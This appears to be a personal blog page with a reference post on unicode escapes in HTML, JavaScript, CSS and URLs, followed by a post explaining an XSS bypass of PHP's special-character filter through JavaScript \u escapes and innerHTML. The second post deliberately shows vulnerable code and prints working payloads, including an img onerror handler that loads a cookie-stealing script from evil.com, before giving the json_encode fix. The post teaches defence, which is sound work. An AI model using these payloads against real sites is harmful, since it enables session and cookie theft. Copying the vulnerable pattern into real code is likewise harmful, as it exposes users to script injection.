[philiptellis] /bb|[^b]{2}/
Never stop Grokking


Showing posts with label unicode. Show all posts

Saturday, January 29, 2011

Printing unicode characters in web documents

I often have to look up reference sites to find out how to write a particular character in HTML, JavaScript or CSS when that character isn't on my keyboard. This post should save me some searching time in future.

To type a character that's not on your keyboard, you need its Unicode code point in decimal or hexadecimal. In the examples below, D stands for a decimal digit and H for a hexadecimal digit, so DD means two decimal digits, HH means two hexadecimal digits, HHHH is four hexadecimal digits, and so on. A trailing + means that more digits may follow: DD+ means two or more decimal digits, HH+ means two or more hexadecimal digits.

HTML

To type out unicode characters in HTML, use one of the following:
  • &#DDD+;
  • &#xHHH+;
eg:
&#393; == Ɖ
&#x189; == Ɖ
&#x2021; == ‡
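
If you'd rather compute the reference than look it up, here is a minimal sketch in JavaScript. The helper name toHtmlReference is made up for this example, and it only looks at the first code point of the string you pass in.

```javascript
// Build an HTML numeric character reference for the first code point
// of a string. toHtmlReference is a hypothetical helper, not a built-in.
function toHtmlReference(ch, hex = false) {
  const codePoint = ch.codePointAt(0);
  return hex
    ? "&#x" + codePoint.toString(16).toUpperCase() + ";"
    : "&#" + codePoint + ";";
}

console.log(toHtmlReference("Ɖ"));        // &#393;
console.log(toHtmlReference("Ɖ", true));  // &#x189;
console.log(toHtmlReference("‡"));        // &#8225;
console.log(toHtmlReference("‡", true));  // &#x2021;
```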

JavaScript

To type out unicode characters in JavaScript, use the following:
  • \uHHHH
eg:
‡ == \u2021
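
The same lookup can be done in code. This is a rough sketch with a made-up helper, toJsEscape, that walks the string one UTF-16 code unit at a time and pads each value to four hexadecimal digits. Because it works on code units, a character above U+FFFF comes out as two escapes (a surrogate pair).

```javascript
// Turn every UTF-16 code unit of a string into a \uHHHH escape.
// toJsEscape is a hypothetical helper name used for illustration.
function toJsEscape(str) {
  let out = "";
  for (let i = 0; i < str.length; i++) {
    const hex = str.charCodeAt(i).toString(16).toUpperCase();
    out += "\\u" + hex.padStart(4, "0");
  }
  return out;
}

console.log(toJsEscape("‡"));   // \u2021
console.log(toJsEscape("Ɖ"));   // \u0189
console.log("\u2021" === "‡");  // true
```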

CSS

To print out a unicode character using CSS content, use the following:
  • \HH+
eg:
‡ == \2021
(Note: the CSS example that I've used here only works in browsers that support the :before pseudo-element and the content property, but in general you can use Unicode characters anywhere in CSS.)
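
A sketch of generating the CSS form from JavaScript, using a made-up helper called toCssEscape. It appends a single space after the hexadecimal digits, on the assumption that the escape may be followed by other text: CSS treats that one space as the end of the escape, so a following character like "a" or "1" isn't read as another digit.

```javascript
// Build a CSS escape (\HH+ followed by a terminating space) for the
// first code point of a string. toCssEscape is a hypothetical helper.
function toCssEscape(ch) {
  return "\\" + ch.codePointAt(0).toString(16).toUpperCase() + " ";
}

console.log(JSON.stringify(toCssEscape("‡")));  // "\\2021 "
console.log('content: "' + toCssEscape("‡") + '";');
```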

URL

URL context is different from HTML context, so I'm including it here.

To print a unicode character into a URL, you need to represent it in UTF-8, using the %HH notation for each byte.
eg:
‡ == %E2%80%A1
л == %D0%BB
' == %27
This is not something that you want to do by hand, so use a library to do the conversion. In JavaScript, you can use the encodeURI or encodeURIComponent functions to do this for you.
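
A short sketch of what that looks like. One thing to watch for: encodeURIComponent leaves a handful of ASCII characters alone, the apostrophe among them. The percentEncodeAll helper below is made up for this example. It assumes a runtime with TextEncoder available and encodes every UTF-8 byte, which is more than you'd normally want but shows the %HH notation directly.

```javascript
console.log(encodeURIComponent("‡"));  // %E2%80%A1
console.log(encodeURIComponent("л"));  // %D0%BB
console.log(encodeURIComponent("'"));  // ' (left unencoded)

// Hypothetical helper: percent-encode every UTF-8 byte of a string.
function percentEncodeAll(str) {
  return Array.from(new TextEncoder().encode(str))
    .map(b => "%" + b.toString(16).toUpperCase().padStart(2, "0"))
    .join("");
}

console.log(percentEncodeAll("'"));  // %27
console.log(percentEncodeAll("‡"));  // %E2%80%A1
```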

End notes

Use escape sequences only in two cases.
  1. Your editor or keyboard doesn't allow you to type the characters in directly.
  2. The characters could be misinterpreted as syntax, eg < or > in HTML.


Thursday, January 20, 2011

Sometimes you need to wash twice

When conversing across languages, information is sometimes lost in translation.

The problem I'll talk about today deals with the different ways in which quotes can be represented in different contexts, in particular, when passing data across language boundaries. Let's look at some code.
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = "<?php echo $s; ?>";

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
From the HTML perspective, this code appears clean. Data from the URL parameter s needs to be written out to HTML and we're applying a suitable filter to it to make it safe for use in that context. This code would be fine if we were passing the data directly from PHP to HTML, but that's not what we're doing here.

Testing this code with the usual suspects (<>&"') shows that it's safe. You can neither insert HTML into the div, nor can you insert JavaScript by getting out of the quotes, since double quotes in the input data are converted to &#34; (and single quotes to &#39;).
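
To make that test concrete, here is a rough JavaScript stand-in for the filter. It's an approximation written for this post, not PHP's actual implementation: it assumes the filter replaces ' " < > & and control characters below 32 with decimal character references, and the name sanitizeSpecialChars is made up.

```javascript
// Approximation of PHP's FILTER_SANITIZE_SPECIAL_CHARS (assumed behaviour):
// replace ' " < > & and characters below 32 with &#DD; references.
function sanitizeSpecialChars(input) {
  return input.replace(/['"<>&\x00-\x1f]/g, ch => "&#" + ch.charCodeAt(0) + ";");
}

console.log(sanitizeSpecialChars(`<>&"'`));  // &#60;&#62;&#38;&#34;&#39;

// A backslash is not on the list, so it passes through untouched.
console.log(sanitizeSpecialChars("abc\\"));  // abc\
```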

It seems that the worst that we can do here is to break the JavaScript by putting a \ at the end of s. The output of our PHP becomes:
<script>
   var s = "...\";

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
The result is that the string literal is never closed, so our JavaScript fails with a syntax error on line 1, and that's the end of it... but maybe not.

The \ gives us a clue. JavaScript strings are Unicode, and inside a string literal we can write a character as \uHHHH, where HHHH is its code point in hexadecimal. This still doesn't help us get out of the quotes in JavaScript, but it does let us mess around with the innerHTML.

What we're doing in the innerHTML assignment is assigning a string to a div's innerHTML property, and then the browser goes ahead and renders that string as if it were HTML. In essence, innerHTML is to HTML what eval() is to JavaScript and PHP — a bad idea.

We can now craft a string made completely using the unicode escape sequences for JavaScript. For example, \u003cscript+src\u003d\u0022http://evil.com/cookie-steal.js\u0022\u003e\u003c/script\u003e

When assigned to the innerHTML, it turns into the following HTML:
<script src="http://evil.com/cookie-steal.js"></script>
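
A small sketch of why this gets past the filter. The payload contains none of the characters the filter looks for, and the escapes are only decoded later, when the JavaScript parser reads the string literal. JSON.parse is used here as a stand-in for that parsing step, which is an assumption of this example rather than what the browser literally does. The + signs from the URL are shown as spaces, as PHP would see them after decoding the query string.

```javascript
// Value of $s as PHP sees it ('+' in the query string decodes to a space).
const payload = String.raw`\u003cscript src\u003d\u0022http://evil.com/cookie-steal.js\u0022\u003e\u003c/script\u003e`;

// None of the characters the HTML filter encodes are present.
console.log(/['"<>&]/.test(payload));  // false

// Stand-in for the JavaScript parser reading the quoted string literal.
const decoded = JSON.parse('"' + payload + '"');
console.log(decoded);  // <script src="http://evil.com/cookie-steal.js"></script>
```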
Fortunately, browsers won't execute script nodes that were added using innerHTML. They will, however, execute inline events on elements added through innerHTML, so we do this instead:
\u003cimg+src\u003dblah+onerror\u003d\u0022s=document.createElement(\u0027script\u0027);s.src\u003d\u0027http://evil.com/cookie-steal.js\u0027;document.body.appendChild(s);\u0022\u003e, which translates to the following HTML (indented for readability):
<img src=blah
   onerror="s=document.createElement('script');
            s.src='http://...';
            document.body.appendChild(s);">
The JavaScript fires in most cases. To get it to fire in all cases, you also need to attach to the onload event.

So, what's the fix here?

To think about the fix, we need to think about context, and every place this user data is being used. Depending on the actual use case, our fix may involve just one change, or several changes to the above code. One change is mandatory though:
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = <?php echo json_encode($s); ?>;

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
The json_encode function returns a quoted JavaScript string. It correctly escapes all characters within that string that are special to JavaScript, so in our case, \u00xx turns into \\u00xx. Note that addslashes is insufficient, as it does not escape newline characters, which are valid inside PHP strings but not inside JavaScript string literals.
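
The effect of that extra escaping can be sketched in JavaScript, with JSON.stringify standing in for PHP's json_encode. The two differ in detail (json_encode also escapes / by default, for example), so treat this as an illustration of the idea rather than of PHP's exact output.

```javascript
// Attacker-supplied text containing JavaScript unicode escapes.
const s = String.raw`\u003cimg src\u003dblah\u003e`;

// Encoding doubles each backslash and adds the surrounding quotes.
const literal = JSON.stringify(s);
console.log(literal);  // "\\u003cimg src\\u003dblah\\u003e"

// Parsing the literal gives back the original text, not markup.
const value = JSON.parse(literal);
console.log(value === s);          // true
console.log(value.includes("<"));  // false

// Newlines are escaped too, which addslashes would not do.
console.log(JSON.stringify("a\nb"));  // "a\nb"
```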

Two things to learn from this:
  1. When passing untrusted data across language boundaries, you may need to sanitize it multiple times
  2. innerHTML is the eval of HTML
